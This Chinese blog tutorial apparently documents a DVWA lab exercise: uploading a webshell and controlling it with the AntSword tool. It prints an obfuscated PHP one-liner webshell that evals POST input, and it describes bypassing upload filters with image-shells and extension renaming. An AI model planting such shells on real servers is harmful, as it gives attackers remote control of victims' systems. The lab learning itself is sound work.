蚁剑文件上传漏洞

Posted 今晚吃什么%

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了蚁剑文件上传漏洞相关的知识,希望对你有一定的参考价值。

前言

前段时间摸鱼的时候看到一篇有关蚁剑的文章感觉挺有意思的,趁着摸鱼时间拿蚁剑实验一下。

(第一次写有点简陋,大家有什么好的建议或者有什么问题可以评论私信我😘)

环境:

祖传靶机:win7虚拟机    IP:192.168.117.128 (DVWA)

物理机:win 10  (工具蚁剑)

步骤:

开始我们现在靶机里把网站环境搭起来,两台主机之间互ping一下网络是否连通,接下来就是使用我们的物理机去访问靶机网站(域名:http://192.168.117.128/login.php)。一顿操作猛如虎结果我把密码忘了;先帝创业未半,而中道崩殂😭 

     还好最后找回了密码,访问成功后把靶机难度调到LOW最低(low状态下基本没有什么代码限制)。

 靶机漏洞难度调整完后,上传shell脚本(shell脚本百度上有很多,我这边是用蚁剑里自动生成shell的脚本)

<?php $qdjZ=create_function(chr(0x1cf-0x1ab).str_rot13('f').chr(0x15009/0x307).chr(228-119).str_rot13('r'),base64_decode('ZQ==').chr(104076/882).str_rot13('n').chr(651-543).chr(01545-01475).base64_decode('JA==').chr(90045/783).chr(0xca0e/0x1d2).str_rot13('z').chr(810-709).str_rot13(')').chr(29028/492));$qdjZ(base64_decode('Njc5M'.'jMzO0'.'BldkF'.'sKCRf'.''.base64_decode('VQ==').base64_decode('RQ==').str_rot13('9').chr(0xbe50/0x244).chr(390-304).''.''.str_rot13('S').chr(0157503/0761).str_rot13('k').base64_decode('TQ==').chr(01077-0725).''.'NdKTs'.'yMDM3'.'Njk5O'.'w=='.''));?>

显示上传成功,文件路径为  hackable/uploads/6.php

文件上传成功后,打开蚁剑连接上传的shell文件,显示连接成功(德芙纵享丝滑)

 PS:在实验的过程中遇到了关于蚁剑连接显示空连接的可以去看一下这位博主 的贴子,写的还是很详细的

复现assert和eval成功连接或失败连接蚁剑的原因_miracle-boy的博客-CSDN博客_蚁剑返回数据为空

蚁剑安装使用教程(附:上传漏洞示例)

蚁剑安装使用教程

蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。

一、下载地址

加载(启动)器:
https://github.com/AntSwordProject/AntSword-Loader
核心源码:
https://github.com/AntSwordProject/antSword

二、安装方法

1.下载为两个文件夹

2.打开启动器,双击AntSword.exe 启动文件

3.初始化,配置核心源代码文件位置

4.双击AntSword.exe 重启
右键添加数据->配置上传木马连接

三、举个例子

文件上传漏洞:

1.制作图片马
(简单测试可直接上传一句话木马文件,图片马用于简单的WAF绕过)

2.记事本形式打开图片马

3.靶场上传图片马

4.发现存在可访问路径,且存在访问权限

5.修改为可执行文件,把hk.jpg 改为 hk.php (可以抓包修改,绕过前端文件格式过滤)

6.蚁剑连接测试

7.添加成功.可进行终端管理和文件操作

注:文章仅用于安全测试人员参考学习,请勿用于其他用途。否则后果自行承担!

以上是关于蚁剑文件上传漏洞的主要内容,如果未能解决你的问题,请参考以下文章

WebShell文件上传漏洞分析溯源(第1题)

WebShell文件上传漏洞分析溯源(第1题)

web漏洞之文件上传漏洞

文件上传漏洞之MIME类型过滤

墨者靶场 内部文件上传系统漏洞分析溯源

墨者靶场 内部文件上传系统漏洞分析溯源